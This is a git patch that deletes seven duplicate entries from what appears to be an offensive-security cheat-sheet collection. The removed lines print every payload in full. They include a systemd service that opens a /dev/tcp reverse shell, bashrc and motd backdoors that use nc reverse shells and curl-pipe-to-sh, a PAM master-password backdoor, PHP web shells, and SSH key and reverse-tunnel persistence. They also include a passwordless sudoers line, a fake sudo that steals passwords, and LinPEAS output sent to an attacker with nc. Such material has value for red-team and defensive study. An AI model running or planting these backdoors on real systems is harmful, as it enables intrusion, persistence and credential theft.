From 6036b38f3521d59613036426c475c93158b3e10e Mon Sep 17 00:00:00 2001
From: Nicholas Ferreira
Date: Thu, 26 Oct 2023 15:46:13 -0300
Subject: [PATCH] removed duplicates

---
 .../1698337732_backdoor_systemd_services.toml | 38 ------------------
 entries/1698337732_bashrc_linux_backdoor.toml | 14 -------
 entries/1698337732_linux_pam_backdoor.toml | 16 --------
 entries/1698337732_linux_privesc_script.toml | 40 -------------------
 entries/1698337732_simple_php_backdoors.toml | 34 ----------------
 entries/1698337732_ssh_backdoors.toml | 40 -------------------
 entries/1698337732_sudo_backdoors.toml | 17 --------
 7 files changed, 199 deletions(-)
 delete mode 100644 entries/1698337732_backdoor_systemd_services.toml
 delete mode 100644 entries/1698337732_bashrc_linux_backdoor.toml
 delete mode 100644 entries/1698337732_linux_pam_backdoor.toml
 delete mode 100644 entries/1698337732_linux_privesc_script.toml
 delete mode 100644 entries/1698337732_simple_php_backdoors.toml
 delete mode 100644 entries/1698337732_ssh_backdoors.toml
 delete mode 100644 entries/1698337732_sudo_backdoors.toml

diff --git a/entries/1698337732_backdoor_systemd_services.toml b/entries/1698337732_backdoor_systemd_services.toml
deleted file mode 100644
index 2be1529..0000000
--- a/entries/1698337732_backdoor_systemd_services.toml
+++ /dev/null
@@ -1,38 +0,0 @@ -title = "Systemd services backdoor" -description = "" -tags = ["linux", "backdoor"] -source = ["https://hosakacorp.net/p/systemd-user.html"] - -[[data]] -description = "Change and and run this script on the compromised machine. The backdoor will run whenever a user logs in into the server:" -language = "ini" -command = """#!/bin/sh -IP="" -PORT="" -SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/" -W_PATH="" -UNIT="voodoo.service" -UNIT_CONTENT="[Unit] -Description=Black magic happening, avert your eyes - -[Service] -RemainAfterExit=yes -Type=simple -ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\" - -[Install] -WantedBy=default.target" - -for i in $SYSTEMD_PATH; do - mkdir -p "$i" - if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi -done - -for k in $W_PATH; do - echo "$UNIT_CONTENT" > "$k/$UNIT" - echo "[*] created voodoo in '$k/$UNIT" -done - -systemctl --user daemon-reload -systemctl --user restart $UNIT > /dev/null -systemctl --user enable $UNIT""" \ No newline at end of file diff --git a/entries/1698337732_bashrc_linux_backdoor.toml b/entries/1698337732_bashrc_linux_backdoor.toml deleted file mode 100644 index c2ee3fb..0000000 --- a/entries/1698337732_bashrc_linux_backdoor.toml +++ /dev/null @@ -1,14 +0,0 @@ -title = "Bashrc backdoor" -description = "Get a reverse shell everytime a new terminal session is started" -tags = ["linux", "backdoor", "bash"] -source = [] - -[[data]] -description = "" -language = "bash" -command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f' >> ~/.bashrc""" - -[[data]] -description = "Example executing remote commands via http:" -language = "bash" -command = """echo 'curl -sk https:///script.sh | sh' >> ~/.bashrc""" 
diff --git a/entries/1698337732_linux_pam_backdoor.toml b/entries/1698337732_linux_pam_backdoor.toml deleted file mode 100644 index 979073f..0000000 --- a/entries/1698337732_linux_pam_backdoor.toml +++ /dev/null @@ -1,16 +0,0 @@ -title = "Linux PAM backdoor" -description = "Log in into any user using a custom password (root required)" -tags = ["linux", "backdoor"] -source = ["https://github.com/zephrax/linux-pam-backdoor",https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9"] - -[[data]] -description = "PAM (Pluggable Authentication Modules) backdoor to log in into any user (root required):" -language = "bash" -command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc - -git clone https://github.com/zephrax/linux-pam-backdoor -#Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases) -#PAM version should be compatible with the one on the target machine -./backdoor.sh -v 1.4.0 -p passw0rd -#This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine. -#Now log in into any user using the password 'passw0rd'. The original user's password still works.""" diff --git a/entries/1698337732_linux_privesc_script.toml b/entries/1698337732_linux_privesc_script.toml deleted file mode 100644 index 9fc3731..0000000 --- a/entries/1698337732_linux_privesc_script.toml +++ /dev/null 
@@ -1,40 +0,0 @@ -title = "Internal enumeration for linux privilege escalation" -description = "Quickly get internal information and search for possible paths to escalate privileges" -tags = ["linux", "enum", "privesc"] -source = ["https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS"] - -[[data]] -description = "Run LinPEAS directly from memory:" -language = "bash" -command = """curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh""" - -[[data]] -description = "If you are on the same local network as the target:" -language = "bash" -command = """#Attacker: -sudo python3 -m http.server 80 - -#Target: -curl /linpeas.sh | sh -""" - -[[data]] -description = "Without curl:" -language = "bash" -command = """#Attacker: -sudo nc -q 5 -lvnp 80 < linpeas.sh - -#Target: -cat < /dev/tcp//80 | sh""" - -[[data]] -description = "Execute from memory and send output back to the attacker:" -language = "bash" -command = """#Attacker: -nc -lvnp 9002 | tee linpeas.out - -#Target: -curl :8000/linpeas.sh | sh | nc 10.10.14.20 9002 -# or -curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh | nc 9002 -""" diff --git a/entries/1698337732_simple_php_backdoors.toml b/entries/1698337732_simple_php_backdoors.toml deleted file mode 100644 index 81af552..0000000 --- a/entries/1698337732_simple_php_backdoors.toml +++ /dev/null 
@@ -1,34 +0,0 @@ -title = "PHP simple backdoors" -description = "" -tags = ["linux", "backdoor", "php"] -source = ["https://github.com/Nickguitar/YAPS"] - -[[data]] -description = "Web PHP backdoor. Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):" -language = "php" -command = """""" - -[[data]] -description = "Tiniest PHP backdoor possible:" -language = "php" -command = """#Run commands with example.com/backdoor.php?0=whoami -""" - -[[data]] -description = "YAPS (the most complete PHP reverse shell)" -language = "bash" -command = """#Upload it to the target machine -#https://github.com/Nickguitar/YAPS/raw/main/yaps.php -#Set up a listener on and run on the attacker's machine: -curl -x POST -d "x=:" example.com/yaps.php - -#If you got access with the previous backdoors (will keep your IP on webserver logs): -#Access example.com/backdoor.php?0=php+yaps.php++""" diff --git a/entries/1698337732_ssh_backdoors.toml b/entries/1698337732_ssh_backdoors.toml deleted file mode 100644 index f8792a4..0000000 --- a/entries/1698337732_ssh_backdoors.toml +++ /dev/null 
@@ -1,40 +0,0 @@ -title = "SSH backdoors" -description = "" -tags = ["linux", "backdoor", "ssh"] -source = ["https://medium.com/@sec_for_safety/ssh-backdoor-how-to-get-a-proper-shell-on-the-victims-machine-52d28fe6dde1"] - -[[data]] -description = "Add your public SSH key to the compromised user's ~/.ssh/authorized_keys file to mantain access." -language = "bash" -command = """#On your machine: -ssh-keygen -f ./id_rsa -cat id_rsa.pub #Copy the public key - -#On the compromised machine (substitute ): -echo '' >> ~/.ssh/authorized_keys - -# set the right permissions -chmod 700 ~/ -chmod 700 ~/.ssh -chmod 600 ~/.ssh/authorized_keys - -#Connect to the compromised machine with -ssh compromised-user@machine-ip -i id_rsa""" - -[[data]] -description = "Backdooring SSH message of the day. This will be run whenever someone logs in into the server via SSH (root required):" -language = "bash" -command = """echo -e '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f &' > /etc/update-motd.d/20-backdoor && chmod +x /etc/update-motd.d/20-backdoor""" - -[[data]] -description = "Reverse SSH tunnel backdoor (firewall bypass)" -language = "bash" -command = """# Run this on the compromised machine: -ssh -N -R 9999:localhost:22 attacker-user@attackerip - -# This will establish an SSH tunnel to the attacker's machine and forward any outgoing traffic from the attacker’s machine on localhost port 9999 back to the victim’s machine on port 22 localhost. -# Then, on the attacker's machine, run: -ssh -i ~/.ssh/id_rsa compromised-user@localhost -p 9999 - -#This will be a persistent backdoor. If you want to clean it, you just need to kill the process running on your own machine on port 9999.""" - diff --git a/entries/1698337732_sudo_backdoors.toml b/entries/1698337732_sudo_backdoors.toml deleted file mode 100644 index b915057..0000000 --- a/entries/1698337732_sudo_backdoors.toml +++ /dev/null 
@@ -1,17 +0,0 @@ -title = "Sudo backdoors" -description = "" -tags = ["linux", "backdoor", "sudo"] -source = ["https://github.com/nisay759/sudo-backdoor"] - -[[data]] -description = "Add your unprivileged user to sudoers (substitute ) (root required). This will give you permission to run any command as root with sudo." -language = "bash" -command = """echo ' ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers""" - -[[data]] -description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading sudo.sh, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:" -language = "bash" -command = """#Change /tmp/sudo if needed -wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo -chmod +x /tmp/sudo -echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc"""